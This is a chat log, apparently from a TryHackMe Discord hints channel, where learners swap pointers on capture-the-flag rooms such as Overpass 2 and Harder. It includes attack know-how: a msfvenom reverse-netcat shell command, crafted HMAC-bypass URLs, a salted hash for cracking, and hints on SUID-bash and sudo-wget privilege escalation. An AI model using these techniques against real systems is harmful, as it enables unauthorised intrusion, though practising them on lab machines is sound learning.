Thank you for your attention 😋 💯

can you show the hash.hash file again dude

user or root?
and where are you?
what have you tried
@brave bear user

soo the genie binary

you dont have to answer the thing you have to find a certain command that you can use in it

||bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3:1c362db832f3f864c8c2fe05f2002a05|| @brave bear

Think about how you can get that command

you dont have to answer the thing you have to find a certain command that you can use in it
@brave bear ohh thanks

i think the hash is right

Think about how you can get that command
@brave bear sure thanks

Overpass2, how am i supposed to || abuse setuid_bash || ? A realllly tiny tiny bit of hint would be naice.

nvm @lucid crescent i think thats the wrong hash you got there

Hey Guys. I would really appreciate any hint on the boiler ctf room. Until now I've enumerated the services and find some directories with dirbuster. I also have a sort of password (not sure) founded on || /joomla/_files/index.html ||
Thank you for your attention 😋 💯
@mossy ermine Just a little up. Really stucked on the last question on task 1

Overpass2, how am i supposed to || abuse setuid_bash || ? A realllly tiny tiny bit of hint would be naice.
@cyan token what have u try??

Have you tried running it

After running, I'm still james...

Run it, do you get a prompt?

yes

And have you tried running help

ohkk thanks. I'll figure it out now.

@brave bear can i DM

sure

Hey I think I got a ||sha1 hash || in harder room I'm trying to crack it with hash cat but it's taking a lot of time

Does it take long to crack?

nvm @lucid crescent i think thats the wrong hash you got there
@brave bear can u tell me which hash i must to crack???

its in the pcap

Are you still on overpass 2?

i copied that from main.go file

thats not the one

thats the default one

Are you still on overpass 2?
@trim haven no, i went to somewhere

I mean you used the right one for hashcat

i must to crack james password from pcap right??

No

That won't help you

its in the pcap
@brave bear he tell

Did you crack the hash for the backdoor?

u mean main.go

Task 4 correct?

I mean 3

SHOOT

I mean 2

This one Crack the hash using rockyou and a cracking tool of your choice. What's the password?

yes

You were using the right hash earlier

You're meant to use the one from question 3

What was the hash that the attacker used? - go back to the PCAP for this!

ok got it

but what is the salt?

Then you go to the github to get the salt

If you look on hash lists for hashcat, it will say Hashname, hash:salt

As the hash is salted

You need to store it in the file in that format

Then hashcat will recognise that the hash has a salt and will use the salt

ok

You can use this to research salts https://en.wikipedia.org/wiki/Salt_(cryptography)

Hey, room : Overpass_v2.
I got the pass for [TASK2] #4 and it's correct. is it for user ||james||

The "Hacker" changes the password so none of the passwords from the /etc/passwd file will work

I cracked it with the salt from |||github||| and the last hash he got

Oh so you cracked it?

Yes

But doesn't seem to log in ssh

Well the whole of that section is about analysing the backdoor

Maybe specify a certain port ?

Perform your nmap scan again and look for any strange ports

Okay thank you

@trim haven salt is ||1c362db832f3f864c8c2fe05f2002a05|| right???

Yup

Now put it in the file hash.txt or whatever in the format ||hashfromquestion4:1c362db832f3f864c8c2fe05f2002a05 ||

and hash type is ||sha512||??

Are you using kali?

yes

In your terminal type hash-identifier then paste the hash when it prompts you to

ok cracked

thx

@trim haven hey any hints on priv esc after running that ||binary||

ls -lAh ~

??

sorry didn't get it ?

Look closely in the home directory @limber iron

That's a fancy command 😄 @trim haven

(stole it from James)

@final mortar Hha i am i don't know really what i'm looking at 👀

@final mortar Hha i am i don't know really what i'm looking at 👀
@limber iron It shows you hidden files..

Yesss it did

It's not something special tho. -A doesn't list . and .. and -h displays size with units

I will stick to ls -la

@final mortar haha me too 😄

So you found something useful ?

Is that ||.suid.bash|| ?

maybe 👀 what do you think

Haha i did run it and i still have no idea on how to escalate to root with it xD

try googling suid and bash together maybe

Okey sure thanks a lot

try gtfo, google, things. do research

Overpass 2, am i going in the right direction || bash 4.4 has a priv esc vulnerability - autocompletion ||?

I mean

Thank you @final mortar got it

Doubt it?

hm

Have you ran ls -lAh ~ in the home directory?

We just discussed that with bvr0n @cyan token fell free to scroll up

i see that heheh

I can see that hidden file using the usual ls -la why should i use that?

#room-hints message

You can just use ls -la all right

Fancy command is better

xD sure

lol

Hello, i get stucked in root from Looking Glass. Can you give me a little hint pleas? Thanks

I apologize. The room is new and hints aren't offered for the first several days of a release.

And for overpass 2?

The same

overpass 2 is walkthrough, that doesn't apply to the rule

Is a walkthrough?

The sudo password isn't working lmao

sudo password?

In the pcap you find user james password

And he has sudo privilegues

All user passwords were changed by the hackers

You have to find the ssh password

i forget -p

hi all... can i ask a little hint on Overpasss2? i completed the TASK2, but i have no idea how to use the backdoor to hack back in....😩

It's an ssh backdoor

There's a keyword in the name ;)

i figured it was not a ssh service... but still have no idea how to use it... in the github is not present instruction/readme about how to use it...

The backdoor is running in a port, try to discover wich port

2222 tcp ethernetip-1 open OpenSSH 8.2p1 Debian 4 protocol 2.02222 tcp ethernetip-1 open OpenSSH 8.2p1 Debian 4 protocol 2.0

i got this from nmap.... but still can't ssh user@ip:222

2222^

use man ssh

to see how to connect to a different port

ssh: Could not resolve hostname ip:2222: Name or service not known

oh ok... i used ip:port... i will look at man

thanks

anyone know this cipher text ||hE a dC fH a :: hE a dC fH a hA iJ a eI aD jB cB hH gA a fH fN||

?

you need to figure out the logic

try to figure out what words could come from this encoded message so you can discover how to decode it

i dont understand with this ciphertext

this cipher was made by the creator for this box

you wont find it on the internet

you need to make a script yourself and decode it

@woven mirage can i PM you

need help

yes

break it task 2 #3 Is there a logical way of solving this?

please anyone give me hint python room?

my script.py doesn't work

If you're talking about the python coding room, we can't really give you a hint

Outermost layers are base16

There's your hint

anyone give me a hint on getting the root.txt on overpass2...how do i execute the function of the py file to get root 😦 ive been stuck for hours

@tight tendon There's no python file

the backdoor file used by the hackers?? 😦

ls -lAh ~ and you will see everything you need

the backdoor file used by the hackers?? 😦
@tight tendon Not python

okay i will try thank you 😄

Very much not python

my mistake am still a noob XD

cant seem to find a solution 😦

There's a rather obviously named file in your home directory

You can use that after some research

So, I'm stuck on Linux Challenges, flag #16. I've tried using findmnt and find commands, but haven't been able to turn anything up. I'm sure I'm missing something simple or I've gone down the wrong rabbit hole trying to find the flag.

The hint refers to the location

Not so much the method of finding it

Ok, I'll keep looking around, thanks!

Hi All, Any hint regarding initial foothold for SET room...

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Room: Wgel Ctf
I have got the user flag need hint for priv esc
I have tried to transfer file using ||wget|| but it is asking for password even when I'm allowed to run that command without password

Have you tried googling wget privilege escalation

gtfo isn't guaranteed to work everytime

I wasn't doing it using gtfo

I found one article on that priv esc
nvm I got it

silly mistake

The first one actually tells you how to do it ^^

I was typing /user/bin/wget instead of /usr/* 😅

It's all good, as long are you learned something

i found an article tried creating my own hash and passed it but i do not get any results any hints on what i'm doing wrong?

harder room

hi , msfvenom -p cmd/unix/reverse_netcat lhost= "my kali vpn ip address" lport=4444 R

In the telnet session i execute .RUN the result of msfvenom, but nothing happens

||http://pwd.harder.local/index.php?n[]=&host=hacker.com&h=e86f889ce1872bcb2d54e7145c1a4b4d85ee32fdf4223ac345106a212f70b2bc || here is the link that i used

hi , msfvenom -p cmd/unix/reverse_netcat lhost= "my kali vpn ip address" lport=4444 R

In the telnet session i execute .RUN the result of msfvenom, but nothing happens
@rose moat can you show screenshots please?

I used nc -lvp 4444 but none

hmm i dont see anything wrong

did the ping work?

apart from that room being buggy

harder?

um what ?

i dont see the welcome message when you connect, is that the correct port?

ping works but nothing from mkfifo

ah i thought you were answering my query on harder room

ah I must have missed that

where is it

few scrolls up

I see

just above zavazkey question

one thing that I can see right away is that you forgot to assign a value to the n[]

||http://pwd.harder.local/index.php?n[]=&host=hacker.com&h=e86f889ce1872bcb2d54e7145c1a4b4d85ee32fdf4223ac345106a212f70b2bc || here is the link that i used
@eternal brook here's my req

so it's null

aren't we supposed to assign null array

and as the ||isset|| defines, nothing will happen if n is null

https://www.php.net/manual/en/function.isset.php

?nonce[]=&hostname=securify.nl&hmac=c8ef9458af67da9c9086078ad3acc8ae71713af4e27d35fd8d02d0078f7ca3f5 i coppied this syntax that i saw in a blog

https://www.securify.nl/blog/spot-the-bug-challenge-2018-warm-up this blog seems quite similar...

oh ok

that works, bust based of a different principal ig

if you are referring n, make sure it's not null

i tried putting value 0,1 still same

the login page only pops up

i've re ran my vpn rebooted the machine don't know what else to try...

Have you understood what the php script actually does

Yeah my b. n array is supposed to be empty

the index.php calls 2 pages auth and hmac...

and there are variables that we can assign given the hmac page...

yeah the articled should work just fine

i understood the blog and hmac function..

yea

but you actually can't use the nonce array

don't know why is'nt it working

it's referred to as n in this room

yea i got that

i used n only

||/n[]=&host=securify.nl&h=c8ef9458af67da9c9086078ad3acc8ae71713af4e27d35fd8d02d0078f7ca3f5||
doesn't work ?

i understood the concept i generated my hash using hmac function but still it's not working

i'll try 1 sec

nope😩

Really

Can I have your machine ip

i've cleared my history too

here?

or dm?

Here is ok

Machine IP

yea that's my tun0 ip

as in the "deployed " machine ip

yea that's my tun0 ip
@eternal brook Yea not that. That's your internal vpn ip

oh shit my bad

10.10.45.150

here it is

You get a login page when you visit the ---.harder.local yes ?

yess

try clicking on remember me, or you haven't figured out the "creds" yet ?

i get a 404 not found

tried both the req yours too and mine too

/n[]=1&host=ros.com&h=73aeb29c6c1c96be662ca4b240afe6bfc950c2f60d6c612e7b4f79a92d662701

here try the n[]=1

tried that

thank you so much for your help anyway appreciate it 👍 🙂

that's your machine

https://i.imgur.com/DVWZn65.png

try with the exact same url as I sent you above, all are not same 😉

make sure you check the "remember me" checkbox when logging in (that caused issues with my buddy)

ok alright thank you so much i'll try that too

All right

I have to go now, so good luck 👍 🙂

no issues mann thanks alot 🙂

Hi guys, new user here. Would really appreciate some help. I'm stuck in task 12, #1 in 'The OWASP Top 10'. I'm not sure which webapp it is referring too.

The webapp

Running on the VM

That you deployed for that task

Deploy button for it is in task 9

i'm looking at vulnversity, and when running nmap with the ||-O|| flag, to find the most likely OS, all it says is 'no exact OS matches for host', and doesn't tell me what the "most likely" OS is

1. It's asking for the distro

2. In the fingerprint it gives you, the OS is listed in there

3. The distro tends to be in the SSH fingerprint or fingerprint for other services. Try a service version scan

if it meant distro why doesnt it say distro

Because no one has changed it yet

nothing i can see in these seems to be the answer

nvm, found it

@stuck fractal I've deployed my machine and read through task 10 as well. Is it referring to the example.db?

Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.

The web application

The website

Is the website the one mentioned in task 8?

The website

Is an web application

Running on the box that you deployed

When I hit deploy, I get my regular kali desktop screen. Which website?

You need to click the deploy button in the room

The Kali is for you to use to attack

You need to deploy the target machine

Have you completed the Welcome room yet?

Yes I have but I'll try again, one moment

I opened my trackhackme box and I only get a terminal window

The VM that you deploy on my-machine is your attacking machine

It is the machine you use to attack other machines

You need to deploy that other machine

With the deploy button. In task 9.

when I click the deploy in task 9, it says the machine is already running

Ok, then the IP address at the top of the page under Active Machine Information is the one that you need

Ok ill try that

What i did was typed [MY_IP]/login in firefox to get to the webapp. Its not opening anything. Am I in the right direction?

No

What machine is running the web server?

😩

why are you typing your ip there, are you the one running the website?

also uh

there is no "sniper" attack type in the payloads tab

there is in the positions tab

wut

but if i just set it in there and start the attack after doing everything else, it says i need to do something in payloads, too

@trim haven

Click on "payload type"

tried that, there's nothing about "sniper" in there

Strange.

hold on, ive terminated and tried running it again

I can't remember from the last time I used the tool.

@copper dome it is not your ip that the website is running on

nvm i think i misunderstood the guide because it ommitted some info

...or not, gdi

they're all allowed?

Room?

https://www.tryhackme.com/room/vulnversity

task 4

@royal venture Toggle the payload encoding

Needs to be off I think

Or on. Whatever it isn't now.

still all 200

Then you're doing something else wrong

well idk man im following the room exactly

And without context, we can't help

you need context, read the room, because i am doing exactly as it says

I've completed the room